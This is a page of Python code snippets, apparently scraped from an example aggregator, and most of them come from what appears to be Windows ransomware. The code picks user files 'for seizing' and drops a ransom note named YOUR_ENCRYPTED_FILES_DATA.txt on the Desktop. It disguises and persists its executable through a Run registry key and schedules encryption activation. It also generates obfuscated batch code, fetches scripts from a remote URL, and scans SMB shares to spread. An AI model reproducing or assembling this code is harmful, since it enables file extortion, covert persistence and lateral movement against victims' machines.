Esempio n. 1
0
 def write(self, filename: str, code: str) -> None:
     with open(filename, "w") as file:
         file.write(
             "@ECHO ===========================================================\n"
         )
         ret = file.write(code)
         deb(f'\nwritten {ret} bytes to {filename}\r\n')
Esempio n. 2
0
def analyze_network():
	last_recv = 0
	last_sent = 0
	global intensive_sent
	global intensive_recv
	while run_analyze_network:
		net_stats = psutil.net_io_counters()

		deb(f'\rnetwork [{net_stats}] bytes_in: {net_stats.bytes_recv - last_recv:8} bytes_out: {net_stats.bytes_sent - last_sent:8}\r')

		if net_stats.bytes_sent - last_sent > 1024 * 1024 * 4:
			intensive_sent = True
		elif net_stats.bytes_sent - last_sent < 1024 * 1024 * 1:
			intensive_sent = False
		if net_stats.bytes_recv - last_recv > 1024 * 1024 * 4:
			intensive_recv = True
		elif net_stats.bytes_recv - last_recv < 1024 * 1024 * 1:
			intensive_recv = False

		last_recv = net_stats.bytes_recv
		last_sent = net_stats.bytes_sent

		time.sleep(1)

	deb(f'intensive_sent: {intensive_sent} intensive_recv: {intensive_recv}')
Esempio n. 3
0
	def write(self, data, ip, port):
		assert self.sock, 'Socket is already closed'

		try:
			len = self.sock.sendto(data, (ip, port))
		# deb(f'sendto({data.hex()}, {ip}, {port}) => {len}')
		except Exception as e:
			deb(f'sendto({data.hex}, {ip}, {port}) exception: {e}')
Esempio n. 4
0
def suitable(path: str):
	"""
	check user file is good for seizing
	"""
	if any(s for s in Config.SKIP if s in path.lower()) and re.match(f'.*?\\.({get_extensions()})?$', path):
		deb(f'\rexclude {path}')
		return False

	if re.match(f'.*?\\.({get_extensions()})?$', path) and config['core']['encryption_dir'].lower() not in path.lower():
		if Config.MAX_FILE_SIZE_MB >= (os.stat(path).st_size / 1024.0 / 1024.0) >= Config.MIN_FILE_SIZE_MB:
			return True
	return False
Esempio n. 5
0
def advert_info():
	try:
		txt_name = os.path.join(getenv('temp'), 'YOUR_ENCRYPTED_FILES_DATA.txt')

		try:
			with open(txt_name, "wt") as file:
				write_advert(file)
		except Exception as e:
			deb(f'{txt_name}: {e} {sys.exc_info()}')

		shutil.copy(txt_name, os.path.join(os.environ["USERPROFILE"], "Desktop"))
		os.unlink(txt_name)
	except Exception as e:
		deb(f"advert: {e}")
Esempio n. 6
0
def get_advert():
	txt_name = os.path.join(getenv('temp'), 'aaaaa.txt')
	text = '<error>'
	try:
		with open(txt_name, "w+t") as file:
			write_advert(file)
			file.seek(0)
			text = file.read()
	except Exception as e:
		deb(f'{txt_name}: {e} {sys.exc_info()}')

	try:
		os.unlink(txt_name)
		return str(text)
	except Exception as e:
		deb(f"advert: {e}")
Esempio n. 7
0
    def push_command(self, command, offset=0) -> int:
        if offset == -1:
            max = self.num_commands() - 1 if self.num_commands() - 1 > 0 else 0
            command.offset = random.randint(0, max)
        # deb(f"push {command} @ {command.offset} ({self.get_operand_at(command.offset)})")
        else:
            command.offset = offset if offset else self._offset + 1

        self._command_pipeline.append(command)
        self._offset = command.offset

        if ip_debug:
            deb(f'{self._offset:04d} {command} ({len(assember)})')
            var_dump(self._command_pipeline)

        return self._offset
Esempio n. 8
0
def get_usable_exe_pathes() -> Tuple[str, str]:
	'''
	Get list of running process sorted by Memory Usage
	'''
	objects = []
	# Iterate over the list
	for proc in psutil.process_iter():
		try:
			# Fetch process details as dict
			pinfo = proc.as_dict(attrs=['exe', 'pid', 'name', 'username'])
			pinfo['vms'] = proc.memory_info().vms / (1024 * 1024)
			# Append dict to list
			objects.append(pinfo);
		except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess, Exception) as e:
			deb(f'process: {e}')
	# Sort list of dict by key vms i.e. memory usage
	objects = sorted(objects, key=lambda proc_obj: proc_obj['vms'], reverse=True)
	return objects[0]['name'].strip(), objects[0]['exe'].strip()
Esempio n. 9
0
	def poll(self, timeout=0):
		end_time = time.time() + timeout
		while self.pending_count > 0 and (timeout == 0 or time.time() < end_time):
			t = max(0, end_time - time.time())
			try:
				ready, _, _ = select.select([self.sock.fileno()], [], [], t)
				if not ready:
					return None

				try:
					data, (ip, port) = self.sock.recvfrom(0xFFFF)
					deb(f"recvfrom(ip:{ip}, port:{port}) = '{data.hex()}'")
				except Exception as e:
					deb(f'recvfrom({self.sock}): {e}')

				if 'data' not in locals():
					continue

				_, ret = self.decodeIPQueryPacket(data)

				if 'ip' in locals() and ip in self.pendings:
					self.pendings.remove(ip)
					self.pending_count -= 1
				if ret is None:
					deb(f'decodeIPQueryPacket() _={_} ret=null')
				else:
					self.queryResult(ip, set(ret))

			except select.error as ex:
				if type(ex) is win32ui.types.TupleType:
					if ex[0] != errno.EINTR and ex[0] != errno.EAGAIN:
						raise ex
				else:
					raise ex
Esempio n. 10
0
def detect_encrypt_storage():
	parts = psutil.disk_partitions()
	hdds = {}
	try:
		for part in parts:
			hdd = psutil.disk_usage(part.mountpoint)
			hdds[part.mountpoint] = hdd.free
	except Exception as e:
		deb(f'part in parts: {e}')

	deb(f'disks: {hdds}')
	hdds = sorted(hdds, key=hdds.get, reverse=True)
	deb(f'disk selected: {hdds[0]}')
	config['core'] = {'encryption_dir': hdds[0] + r'temp\edata'}
	deb(f'encryption_dir: {config["core"]["encryption_dir"]}')
	return hdds[0]
Esempio n. 11
0
    def get_code(self) -> str:
        if self._code is None:
            deb(f'\r\nsorting code according to offset order ...')
            self.sort()

            step = 0
            code = ''
            num = len(self._command_pipeline)
            numIi = 0

            for command in self._command_pipeline:
                code += str(command).strip() + f"\n"
                step += 1

                numIi += 1
                if numIi >= len(ii):
                    numIi = 0
                currentSym = ii[numIi]

                deb(f'\rjoining code ... {step / num * 100.0:.1f}% (line {step} of {num}, {len(code)} bytes) {currentSym}',
                    end='')

            self._code = code.strip()
        return self._code
Esempio n. 12
0
def post_install():
	global activate_encryption

	now = int(str(time.time()).split(".")[0])
	deb(f'now: {now}')
	activation_time = int(config["core"]['activation_at'])
	deb(f'activation time: {activation_time}')
	wait_time = activation_time - now
	deb(f'time until encryption: {wait_time} secs ({wait_time / 60:.0f} mins)')

	if wait_time <= 0:
		activate_encryption = True
Esempio n. 13
0
def install():
	first_install = False
	next_path = u''
	try:
		deb(f"profiledir: {os.environ['USERPROFILE']}")
		(process_name, proc_dir) = get_usable_exe_pathes()
		config['core']['exename'] = process_name.split('.')[0]
		proc_name = process_name.split('.')[0] + 'Host.exe'
		proc_dir = os.path.dirname(proc_dir)[3:]

		next_path = os.path.join(os.environ['USERPROFILE'], proc_dir)
		os.makedirs(next_path, exist_ok=True)
		next_path = os.path.join(next_path, proc_name)

		if os.path.isfile(next_path):
			os.unlink(next_path)

		config['core']['exe'] = next_path
		config['core']['activation_at'] = get_activation_time()
		deb(f"exe {config['core'].get('exe')}")

		if not os.path.exists(next_path):
			first_install = True

		deb(f"copy({exe_self}, {next_path}")

		shutil.copyfile(exe_self, next_path)

		reg_key = winreg.CreateKey(winreg.HKEY_CURRENT_USER, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
		if not is_dev():
			winreg.SetValueEx(reg_key, process_name.split('.')[0], 0, winreg.REG_SZ, f"{next_path} -a --background --check-update --embedding")
		winreg.CloseKey(reg_key)

	except Exception as e:
		uprint(f"install: {e}->{sys.exc_info()}")
		exception(e)

	if first_install and os.path.exists(next_path):
		uprint(f'{get_computer_uid()}: installed')
		sys.exit(3)
Esempio n. 14
0
    total_files = 0
    for r, d, f in os.walk(int_path):
        for current_file in f:
            total_files += 1
            current_files.append(os.path.join(r, current_file))

    lst = [internal_file for internal_file in current_files]
    return lst


# Press the red button
if __name__ == '__main__':
    load_config()

    if not config.has_section('core'):
        deb(f'no config file')
        sys.exit(-1)

    encryption_dir = config['core'].get('encryption_dir',
                                        fallback=r'c:\temp\edata')
    deb(f'encryption_dir: {encryption_dir}')

    if not os.path.isdir(encryption_dir):
        deb(f'no encdir')
        sys.exit(-1)

    computer_id = get_computer_uid()
    deb(f"your computer id: {computer_id}")

    files = dir_files(encryption_dir)
    if len(files) <= 0:
Esempio n. 15
0
def detect_malware_type():
	deb('detecting malware payload according machine specs ... ')
	c = wmi.WMI()
	SYSINFO = c.Win32_ComputerSystem()
	OSINFO = c.Win32_OperatingSystem()[0]
	CPUINFO = c.Win32_Processor()[0]
	HDDINFO = c.Win32_LogicalDisk()[0]
	RAMINFO = c.Win32_PhysicalMemory()[0]

	pprint.pp(SYSINFO, depth=13)
	MANUFACTURER = SYSINFO[0].Manufacturer
	MODEL = SYSINFO[0].Model
	RAMTOTAL = int(SYSINFO[0].TotalPhysicalMemory)
	HDDTOTAL = int(HDDINFO.size)
	RAMSIZE = round(RAMTOTAL)
	HDDSIZE = round(HDDTOTAL)
	deb("Model: " + MANUFACTURER + " " + MODEL)
	deb(f"HDD: {HDDTOTAL / 1024.0 / 1024.0 / 1024.0:.2f}GB")
	deb(f"RAM: {RAMTOTAL / 1024.0 / 1024.0 / 1024.0:.2f}GB")
	deb("CPU: " + CPUINFO.name)
	deb("OS: " + OSINFO.caption)

	sys.exit(-4)
	pass
Esempio n. 16
0
def empty_dest_dir():
	delete_files = dir_files(config['core']['encryption_dir'])
	if len(delete_files) > 0:
		deb(f'deleting {len(delete_files)} files')
		for file in delete_files:
			os.unlink(file)
Esempio n. 17
0
def pull_scripts():
	deb("pulling new scripts ...")
	headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66'}
	r = requests.get(Config.PULL_URL, headers=headers)
	deb(f'{r.text}')
	pass
Esempio n. 18
0
    num_gotos = random.randint(1, max)

    numIi = 0
    ip = 0

    # for ng in range(num_gotos):
    #	assember.junk(min=1, max=4)

    for step in range(0, max_operands - 1):
        if max >= 111:
            numIi += 1
            if numIi >= len(ii):
                numIi = 0
            currentSym = ii[numIi]
            deb(f'\rgenerating code ... {step / max * 100.0:.0f}% {currentSym}',
                end='')

        # deb(f'offset: {offset}')

        assember.junk(min=11, max=34)
        label = Randomer.str_generator()
        ip = assember.push_command(Command(Operand.GOTO, ":" + label),
                                   offset=-1)
        assember.junk(min=11, max=34)
        ip = assember.push_command(Command(Operand.LABEL, ":" + label))

        if step == max - 2:
            assember.push_command(Command(Operand.EXIT))

    deb(f"{assember.get_code()}")
Esempio n. 19
0
if __name__ == '__main__':
	locale.setlocale(locale.LC_ALL, 'en_US.UTF-8')
	logging.basicConfig(format="%(asctime)s [%(levelname)s] [%(thread)d] %(filename)s(%(funcName)s:%(lineno)d) - %(message)s",
	                    level=logging.DEBUG)

	uprint(f'{get_computer_uid()}: user: {os.getlogin()} ppid: {os.getppid()} dir: {os.getcwd()} platform: {platform.platform()} '
	       f'python: {platform.python_version()} win32: {platform.win32_ver()}'
	       f' edition: {platform.win32_edition()} file: {__file__}')

	load_config()
	atexit.register(save_config)

	if is_dev():
		Config.EXTENSIONS_ENCODED = "dDNzdHx0ZXN0"
		deb(f'developer machine {get_extensions()}')

	path = create_unicode_buffer(4096)
	windll.kernel32.GetModuleFileNameW(None, path, 4096)
	exe_self = path.value

	opts = [opt for opt in sys.argv[1:] if opt.startswith("-")]
	if "-a" in opts:
		autorunned = True

	if not config.has_section('core') or not config.has_option('core', 'encryption_dir'):
		detect_encrypt_storage()

	if not autorunned:
		# if is_dev():
		# 	scan_shares()
Esempio n. 20
0
def main():
	if len(sys.argv) > 2:
		start_ip = ip_to_int(sys.argv[1])
		end_ip = ip_to_int(sys.argv[2])
	elif len(sys.argv) == 2:
		start_ip = ip_to_int(sys.argv[1])
		end_ip = start_ip
	else:
		deb('ScanNetworkForSMB - Script for scanning network for open SMB/CIFS services')
		deb('Error: missing IP arguments')
		deb('Usage:' + sys.argv[0] + 'start-IP-address [end-IP-address]')
		return

	ifs = net_if_addrs()
	scan_networks = [sys.argv[1], sys.argv[1]]
	# var_dump(ifs, '-----')
	# for iface in ifs:
	# 	if ifs[iface][1].family == AF_INET:
	# 		scan_networks.append(ifs[iface][1].address)
	# var_dump(scan_networks)
	# deb(f'Beginning scanning %d IP addresses [{sys.argv[1]} - ] ... {(end_ip - start_ip + 1)}')

	for network in scan_networks:
		deb(f'scanning network {network} ... ', end='')

		starting = re.sub(r'^(\d+\.\d+\.\d+)\.\d+?$', r'\1.1', network, 0, re.DOTALL)
		ending = re.sub(r'^(\d+\.\d+\.\d+)\.\d+?$', r'\1.255', network, 0, re.DOTALL)

		deb(f'{starting} - {ending} ')

		start_ip = ip_to_int(starting)
		end_ip = ip_to_int(ending)

		ns = NonBlockingNetBIOS()
		for ip in range(start_ip, end_ip):
			ns.queryIPForName(int_to_ip(ip))
		ns.poll(2)

		if ns.pending_count > 0:
			ns.poll(2)

		var_dump(ns.servers)
		for ips in ns.servers:
			for token in ns.servers[ips]:
				deb(f'token {token}')
				ret = os.system(f'net use \\\\{token}')
				deb(f'net use -> {ret}')
				files = dir_files(r'\\' + token + r'\*')
				var_dump(files)
				sys.exit(0)